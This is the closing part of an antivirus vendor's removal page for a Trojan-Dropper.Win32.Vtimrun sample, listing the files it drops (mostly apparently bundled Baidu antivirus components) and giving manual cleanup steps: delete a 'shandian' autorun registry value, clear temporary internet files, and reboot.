%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\ieBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDShellExt64.dll (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\KVCommonRes.rdb (132004 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\GameNoDisturb.ini (215 bytes)
%Documents and Settings%\All Users\Desktop\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™.lnk (959 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\hips.xml (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\CoolyContainerConfig.xml (329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVMainframePluginContainerConfig.xml (384 bytes)
%System%\drivers\bd0003.sys (55 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMBase.dll (7345 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\809.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\kav_verify.dat (677 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\index.dat (1404 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMNet.dll (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDDownloader.exe (9605 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\systemfile.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVLogs.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMUpdate.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMDownload.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\licenses\duilib license.txt (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVTrayTipsPlugin.dll (6584 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdvs.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDUDiskGuard.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bdvs.dat (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMPatchAgent.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdRepair.exe (13584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\NewPih.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\UserDetectionPlugin.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\fm.dat (597 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMAVE.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSDWrench.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVLogs.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\PluginInstallHelper.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVConfig.rdb (4992 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVVirusPlugins.dll (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\CompatibilityChecker.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\PrivacyProtect.dll (6360 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\GetSupplyId.dll (3616 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\virus_type.dat (485 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\app.ico (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMTinyXml.dll (6584 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDAVCScan.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\BDMWrench.sys (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\updlog.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTips.rdb (2392 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%System%\config (96 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdRepair.exe (2321 bytes)
%System%\drivers\bd0002.sys (1281 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\901.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bdmp.dat (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ad.dll (15168 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSd.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdUProxy64.exe (23936 bytes)
%WinDir%\Prefetch (480 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\BDKVVirusPlugins.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDDownloader.exe (42222 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMMsg.dll (1552 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDDownLoadProtectPlugin.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVMainFrame.dll (32128 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVMainframe_PluginConfig.xml (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVWsc.exe (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\MSHist012014060120140602\index.dat (388 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMRepMgr.dll (10136 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\updlog.dll (15 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMEvents.dll (15 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdUpdate.exe (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0001.sys (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\CompatibilityChecker.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMReport.dll (2105 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDCooly.dll (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVDeskBand.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDArKit.sys (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\804.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMMsg.dll (33 bytes)
%Program Files%\Internet Explorer (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\RtpContainerConfig.xml (818 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\baidusdRepair.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\msvcp80.dll (19096 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ToastImage.png (5 bytes)
%WinDir%\WinSxS\Manifests (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\ad.dll (2321 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\900.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSdTray.exe (46916 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMPerfMon.dll (5064 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMStringUtils.dll (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMUpdate.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DriverManager.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMSREng.dll (9608 bytes)
%Documents and Settings%\All Users\Start Menu\Programs\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™\Ã§â„¢Â¾Ã¥ÂºÂ¦Ã¦Ââ‚¬Ã¦Â¯â€™.lnk (971 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\806.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tuopan.png (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDownloadProtect_x64.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\HIPS.dll (30968 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\tips.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\RepairPluginContainerConfig.xml (228 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMNet.dll (5873 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\810.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMFrameWork.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKV.rdb (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dnw.xml (149 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\baidusdRepair.dll (4992 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDUDiskGuard.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMPerfMon.dll (673 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVRtp_PluginConfig.xml (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\TrustAndIso.dll (1281 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMStringUtils.dll (49 bytes)
%WinDir%\Temp\Perflib_Perfdata_120.dat (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\TrayPluginContainerConfig.xml (945 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BaiduSd.exe (13368 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\UserDetectionPlugin.dll (5520 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\uninst.exe (5873 bytes)
%System%\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVRmvDevPlugin.dll (8560 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\index.dat (484 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepMgr.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\Cooly_PluginConfig.xml (720 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KVTray_PluginConfig.xml (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\KavUpdate.dll (9320 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\DesktopToast.exe (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\901.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\GameNoDisturb.ini (215 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\BDAVCScan.dll (601 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\900.dat (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\directui license.txt (593 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\duilib license.txt (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKVWsc.exe (13368 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\monitor_config.dat (559 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\810.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\wverify.dat (15019 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDKitUtils.dll (54 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\BDKVRmvDevPlugin.dll (1281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\Cooly_PluginConfig.xml (720 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\TrayPlugin.rdb (20624 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\bd0003.sys (55 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMBase.dll (32128 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdSvc.exe (2321 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\KVInstallHelper.dll (12536 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\scan_mgr_config.dat (5 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.CRT\msvcr80.dll (21216 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMAVCached.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSREng.dll (1425 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bd0003.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\uninst.exe (28288 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BAV\bdmp.dat (25 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\bduf.dll (11048 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMPatchAgent.dll (26 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\coolyplugins\CoolyContainerConfig.xml (329 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\HIPS.dll (7345 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\FileMon.dll (3361 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ToastLogo.ico (12024 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\hips.xml (17 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\repairplugins\RepairPluginContainerConfig.xml (228 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMWrench.sys (3616 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\811.dat (8 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\Repair_PluginConfig.xml (411 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BSRLib.dat (5064 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bd0001.dll (673 bytes)
%System%\drivers\bd0001.sys (601 bytes)
%Program Files%\Common Files\Adobe\Acrobat\ActiveX (4 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\app.ico (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\TrustAndIso.dll (8184 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\virus_type.dat (485 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDConfig.dll (19152 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDKitUtils.dll (1856 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\explugin\npBaiduSDDetectPlug.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUProxy64.exe (4545 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\PrivacyProtect.dll (673 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmantivirus\BDMRepBase.dll (5873 bytes)
%Program Files%\Messenger (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\FileMon.dll (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMDownload.dll (11344 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvtrayplugins\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\kav_verify.dat (677 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\804.dat (3 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.ATL\atl80.dll (3312 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDMSDWrench.dll (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDLogicUtils.dll (9320 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\System.dll (784 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDConfig.dll (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BaiduSdUpdate.exe (3361 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkvrtpplugins\Microsoft.VC80.ATL\Microsoft.VC80.ATL.manifest (466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMRepBase.dll (27704 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\BDKVDeskBand64.dll (601 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\BDArKit.sys (601 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\cache_config.dat (469 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Microsoft.VC80.CRT\msvcm80.dll (16424 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\plugins\bdkv\KVMainframePluginContainerConfig.xml (384 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\Config\809.dat (3 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\ToastImage.png (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\BDMReport.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\TrayPluginContainerConfig.xml (945 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\BDMSRCore.dll (1425 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\Skins\Default\BDKVTray\TrayPlugin.rdb (18424 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsm6.tmp\file\NetService.ini (615 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\bdmsysrepair\Microsoft.VC80.CRT\Microsoft.VC80.CRT.manifest (1 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\drivers\bd0001.sys (601 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\FileSignDB\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\CachedDB_1\MANIFEST-000002 (4 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db (149 bytes)
%Documents and Settings%\All Users\Application Data\Baidu\BaiduSd\privacy.db-journal (532 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\bddownloader.exe (9605 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\bdcomproxy.dll (601 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\7z.dll (2105 bytes)
%Program Files%\Common Files\Baidu\BDDownload\106\dl.dll (14988 bytes)
%Program Files%\Baidu\BaiduSd\1.8.0.1255\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\bdcomproxy.dll (2392 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\bddownloader.exe (41699 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\dl.dll (65930 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\BDDownloader_Installer\1.0.106.1[2014-6-1-1-41-38]\7z.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsoC.tmp\System.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsiB.tmp (90616 bytes)

Delete the following value(s) in the autorun key (How to Work with System Registry):

[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"shandian" = "%Program Files%\shandian\shandian.exe"

Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).

Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Did you found this article useful:
No votes yet

Permalink

Back to the blog

e-mail

Linkedin

Google+

Twitter

Facebook

E-mail

Recipient's email address:

Your Name:

Your email address:

Trojan-Dropper.Win32.Vtimrun_4733c34a7c

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Discover the new adaware antivirus 12

Our best antivirus yet